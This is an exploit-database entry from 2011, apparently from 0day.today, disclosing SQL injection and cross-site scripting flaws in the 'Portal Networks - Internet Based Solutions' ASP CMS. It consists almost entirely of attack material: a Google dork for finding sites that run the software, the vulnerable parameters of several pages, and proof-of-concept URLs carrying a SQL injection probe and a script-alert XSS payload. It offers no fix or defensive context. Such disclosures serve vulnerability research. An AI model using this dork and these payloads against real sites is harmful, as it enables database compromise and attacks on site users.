id: 15524
date: 03/01/2011
title: Portal Networks - Internet Based Solutions CMS Multiple Vulnerabilities
author: p0pc0rn
cves: 

Web    : http://www.portalnetworks.com.mx/
Found by: p0pc0rn 01/03/2011
Dork   : intext:"Powered by: Portal Networks - Internet Based Solutions" asp

SQL
---

http://site.com/buscar.asp?linea=[SQL]
http://site.com/buscar.asp?q=[SQL]
http://site.com/detalle.asp?clave=[SQL]
http://site.com/searchProduct.asp?action=search&qSearch=[SQL]

XSS
---

http://site.com/buscar.asp?q=[XSS]
http://site.com/error.asp?Error=[XSS]

POC
---
http://site.com/detalle.asp?clave=1337' having 1='1
http://site.com/buscar.asp?q=<script>alert(1)</script>



#  0day.today [2023-03-22]  #